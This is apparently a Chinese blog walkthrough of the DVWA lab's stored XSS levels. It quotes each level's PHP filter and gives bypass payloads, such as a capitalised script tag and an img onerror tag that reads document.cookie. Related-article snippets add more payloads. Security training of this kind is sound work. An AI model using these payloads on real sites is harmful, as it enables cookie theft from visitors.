DVWA - XSS (Stored) (low, medium, high)

最新推荐文章于 2024-09-19 11:51:52 发布
最新推荐文章于 2024-09-19 11:51:52 发布
阅读量2.8k 收藏 1
点赞数
分类专栏: CTF 文章标签: security
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SCNU_Jiechao/article/details/54140435
版权

low

无验证,Massage直接注入

<script>alert(document.cookie)</script>

medium

查看源码发现Name只过滤了<scrpit>标签

$name = str_replace( '<script>', '', $name );

绕过思路:HTML页面修改Name的最大输入长度,注入Name,注入script大写

<input name="txtName" type="text" size="30" maxlength="100">
<Script>alert(document.cookie)</script>

high

查看源码,可发现Name只用正则过滤了

$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );

绕过思路:HTML页面修改Name的最大输入长度,注入Name,注入换一种标签,这里用img

<img src=1 onerror=alert(document.cookie)>
jchalex
关注
专栏目录
DVWAXSS (完整版)
一期一会的博客
03-30 5393
xss DOM型xss
DVWAXSS
qq_39670065的博客
08-08 398
Reflected Cross Site Scripting (XSS) low 直接尝试<script>alert('xss')</script> 弹窗成功 medium 还是先尝试<script>alert('xss')</script> 发现并没有弹窗但页面显示了Hello alert('xss') 猜测是<script>被删除 看波源码 <?php header ("X-XSS-Protection: 0"); // Is th
DVWA -XSSStored)-通关教程-完结
刘箫-技术库
04-11 2933
XSS 攻击全称跨站脚本攻击。是指用户在 Web 页面提交恶意脚本,从而使浏览包含恶意脚本的页面的用户在不知情的情况下执行该脚本,导致被攻击的行为。与 SQL 注入类似,XSS 也是利用提交恶意信息来实现攻击效果的攻击行为。但是 XSS 一般提交的是 Javascript 脚本,运行在 Web 前端,也就是用户的浏览器;而 SQL 注入提交的SQL 指令是在后台数据库服务器执行。所以两者攻击的对象是不一样的。
web基础—dvwa靶场(十)XSS
最新发布
m0_74080781的博客
09-19 1332
DOM 型 XSS是特殊的反射性 XSS,是基于 DOM 文档对象模型的漏洞。DOM(Document Object Model) 译为文档对象模型,是 HTML 和 XML 文档的编程接口,可以使程序和脚本能动态访问和更新文档的内容、结构和样式。HTML 标签作为结点构成了 DOM 节点树,树的节点都可以通过 JavaScript 进行访问。
DVWA--XSS(stored)
weixin_45038413的博客
05-09 209
Low等级 前端限制了输入的长度 <script>alert(1)</script> 修改前端代码绕过限制 使用burpsuit改包绕过 Medium 等级 使用嵌套和大小写绕过发现name注入成功,message注入失败 查看源码发现在message处使用了strip_tags()和htmlspecialchars()进行过滤 High 等级 使用img和i...
DVWAStored XSS(存储型XSS)
weixin_50464560的博客
03-14 288
目录 Low Medium High Impossible Low 源代码: <?phpif( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); ...
DVWA--XSS(DOM)
weixin_45038413的博客
05-09 574
Javascript弹窗函数 Low 等级 Medium 等级 过滤了<script stripos() 函数查找字符串在另一字符串第一次出现的位置(不区分大小写) 使用img标签发现没有弹窗 查看网页源码,发现语句被插入到了value值,并没有插入到option标签的值,所以img标签并没有发起任何作用。 构造语句闭合option标签: default=></o...
DVWA-XSS(Reflected+Stored)
原味瓜子、的博客
09-24 346
文章目录XSS-Reflected反射型一、各等级漏洞分析及利用XSS-Stored存储型一、各等级漏洞分析及利用 XSS-Reflected反射型 把用户输入的数据反射给浏览器,诱使用户点击一个恶意链接,才能攻击成功。 一、各等级漏洞分析及利用 Low等级,没做任何过滤 直接弹 medium等级,过滤掉<script>,用空替换掉 大小写、过滤规则漏洞利用,使用其他标签 high等级,匹配一些<script>的关键字符,进一步过滤<script>
DVWA-存储型xss
Darklord.W
04-09 540
存储型: 低: 输入 <script>alert('XSS stored')</script> 存储型XSS是长期存储在服务器端,每次访问时都会执行js脚本 <script onload=alert('XSS1')> <a href=https://www.baidu.com>登录</a>3 <scrip...
DVWA-xss详细讲解
qq_43395215的博客
05-08 1344
XSS,全称跨站脚本,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要修改的是,XSS不仅仅扩展JavaScript,还包括flash等其他脚本语言。根据恶意代码是否存储在服务器XSS可以分为存储型的XSS与反射型的XSS。 博客地址:http://soliym.top/ XSS分类: 反射型xss:只是简...
DVWA-master.zip
08-22
部署完成后,通过浏览器访问DVWA,按照不同安全级别设置(Low, Medium, High, Impossible)逐个挑战各个漏洞,了解其工作原理并学习防御措施。 **总结** DVWA靶场是一个强大的学习工具,涵盖了Web安全的多个重要...
DVWA-XSS (Stored)
qq_45751902的博客
04-25 3164
目录简介安全级别Low安全级别Medium安全级别High安全级别:Impossible 简介 存储型XSS 长期存储于服务器端; 每次用户访问都会执行脚本代码; 安全级别Low 查看源码 <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] );
DVWA-XSS
qq_58091216的博客
04-19 5689
一.DOM型xss 1.low (1)我们知道最基础的xss攻击就是<script>alert(/xss/)</script> (2)我们看到english直接按select,可以看到?default=English,我们知道在?default后面进行xss攻击 (3)我们直接输入<script>alert(/xss/)</script>,可以看到弹窗 (4)因为low比较简单所以我把分析源代码放在了最后。可以看到没有如何防御 2.m.
DVWA】8. 存储型XSS Stored(Low+Medium
Zichel77的博客
12-13 1038
当用户访问该留言板页面时,恶意代码执行,通过document.cookie函数获取当前用户的cookie值,赋给站点xss.php文件,xss.php文件定义也文件操作,将获取的cookie写入站点cookie.txt文件,此时攻击者就获取了用户的cookie值。我们测试一下在Message栏,能否执行标签,在测试过程,name栏也有长度限制,我们修改其源码,增大长度插入标签。函数会对字符串的特殊符号(\x00,\n,\r,\,‘,“,\x1a)进行转义。的 POST 变量。
DVWA学习之XSS
千寻的博客
01-02 507
DVWA学习之XSS 反射性XSS Low等级 【】 Medium等级 双写绕过: 【<scr 大小写绕过 【】 High等级 【] []当点击键盘任意一个按键的时候触发。 Impossible等级 存储型XSS Low等级 trim(string,charlist) 函数移除字符串两侧的空白字符或其他预定义字符,预定义字符包括、\t、\n、\x0B、\r以及空格,可选参...
DVWA-XSS (Reflected)-反射型XSS
seanyang_的博客
06-12 3397
XSS攻击,是指攻击者在Web页面输入恶意的JavaScript脚本,而Web应用程序没有对用户的输入进行过滤或处理就直接执行,将结果输出在网页。如果恶意JavaScript脚本被存储到后端服务器,用户打开该Web页面时,恶意脚本则可能在浏览器自动执行。XSS攻击依赖于JavaScript脚本的执行。一般,攻击者插入恶意脚本后,需要将脚本执行结果显示出来,因此,XSS攻击常见于网站有用户输入且能够显示的地方,如文章发表、评论回复、留言板等。
DVWA--XSS详解
洋洋的小黑屋
12-29 8699
DVWAXSS详解 XSS概念:通常指黑客通过HTML注入纂改了网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击XSS三种: 反射型xss:只是简单地把用户输入的数据反射给浏览器,简单来说,黑客往往需要用户诱使用户点击一个恶意链接,才能攻击成功。 存储型XSS:将用户输入的数据存储在服务器端。用户访问了带有xss得页面代码后,产生安全问题。 DOM XSS:通过修改页面的D...
网站渗透DVWA之存储型XSS
weixin_34388207的博客
04-26 183
本文由甲爪cpa联盟(www.jiazhua.com)整理编辑!转载请注明!环境是PHPWAMP,firefox(火狐没有xss过滤器)。环境dvwa如果下载不方便可以评论留邮箱,看到会分享到邮箱的。 1,简介。2,低级代码利用。3,级代码利用。4,高级代码利用。5,终极代码学习。 1,简介 DVWA攻击演练系统。XSS使自己脚本在...
DVWA——XSS(Stored)(low)
分享简单的安全技术
01-14 280
XSS(Stored) 界面 源代码 <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); // Sanitize message input $message = stripslashes( $message ); $mess
DVWA-XSS(DOM)
08-25
DVWA-XSS(DOM)是指DVWA靶机学习的一种XSS攻击,它利用了DOM(文档对象模型)的漏洞。DOM是一个与平台、编程语言无关的接口,允许程序或脚本动态地访问和更新文档内容、结构和样式。而DVWA-XSS(DOM)攻击则是通过在DOM注入恶意脚本来篡改网页,从而控制用户浏览器的一种攻击行为。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [houkc.github.io:HouKC的博客](https://download.csdn.net/download/weixin_42157567/18459500)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [DVWA-XSS(DOM)](https://blog.csdn.net/weixin_44866139/article/details/104101228)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值